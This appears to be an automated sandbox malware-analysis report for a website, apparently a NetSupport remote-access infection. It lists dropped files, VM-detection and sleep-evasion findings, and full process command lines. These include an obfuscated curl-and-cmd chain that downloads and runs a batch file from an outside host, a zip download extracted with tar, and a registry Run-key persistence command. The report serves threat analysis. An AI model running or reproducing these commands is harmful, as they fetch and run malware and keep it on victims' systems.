Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PP1
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PP1

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\osk.exe	Window / User API: threadDelayed 2000	Jump to behavior
Source: C:\Windows\System32\osk.exe	Window / User API: threadDelayed 361	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Window / User API: threadDelayed 549
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Window / User API: threadDelayed 9104

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\hw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll	Jump to dropped file
Source: C:\Windows\System32\tar.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\osk.exe TID: 7172	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe TID: 3276	Thread sleep time: -137250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe TID: 3276	Thread sleep time: -2276000s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: explorer.exe, 00000014.00000000.1326758086.0000000002A20000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42efC
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt_@
Source: explorer.exe, 00000014.00000003.2018164212.000000001031B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: TCCTL32.DLL.31.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: explorer.exe, 00000014.00000000.1337084127.0000000008381000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1920742592.0000000008393000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: chrome.exe, 00000000.00000003.1775422383.0000742403BB8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: explorer.exe, 00000014.00000003.2021431230.000000000841F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}icense-Show
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000014.00000003.1920742592.00000000083B8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTnaVMWare
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: curl.exe, 0000001B.00000003.1453761095.000001D085104000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001E.00000003.1475957554.0000020082825000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000029.00000003.1988579765.00000257DB974000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000030.00000003.2172999434.000002428A584000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000014.00000000.1337084127.00000000081F1000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUSm32\DriverStore\en-GB\mshdc.inf_loc
Source: explorer.exe, 00000014.00000003.2021431230.0000000008432000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000014.00000000.1343526292.000000000B990000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00%
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: osk.exe, 00000013.00000003.2248404527.000002ED5F2A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmcI
Source: TCCTL32.DLL.31.dr	Binary or memory string: VMWare
Source: explorer.exe, 00000014.00000003.2018164212.000000001031B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@#
Source: explorer.exe, 00000014.00000000.1345005602.000000000BFE4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIES1371
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A82000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware Virtual RAM
Source: explorer.exe, 00000014.00000000.1327863404.0000000006BE8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000CJ
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000S
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000014.00000003.2021431230.000000000841F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -s -o C:\Users\user\AppData\Roaming\gety.zip https://www.stlchicago.com/rabu.zip??56cfb29adde612865acb	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf "C:\Users\user\AppData\Roaming\gety.zip" -C "C:\Users\user\AppData\Roaming\Dire"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Dire\client32.exe "C:\Users\user\AppData\Roaming\Dire\client32.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "PP1" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Dire\client32.exe" /f	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\cvcv.bat Enter
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat

Source: PCICL32.DLL.31.dr	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000014.00000003.2021431230.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2039234356.0000000008519000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.1583696942.0000000008519000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp, PCICL32.DLL.31.dr	Binary or memory string: Progman
Source: explorer.exe, 00000014.00000000.1326344011.0000000000C21000.00000002.00000001.00040000.00000009.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000014.00000000.1325975959.0000000000489000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanH9

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\gety.zip VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Roaming\Dire VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Yara detected NetSupport remote tool

Source: Yara match	File source: 32.0.client32.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000000.1486224969.00000000007CF000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: client32.exe PID: 3988, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\pcicapi.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\client32.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL, type: DROPPED

Windows Analysis Report
http://fountainofhealth.ca

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Windows Analysis Report http://fountainofhealth.ca

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Phishing

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Screenshots

Windows Analysis Report
http://fountainofhealth.ca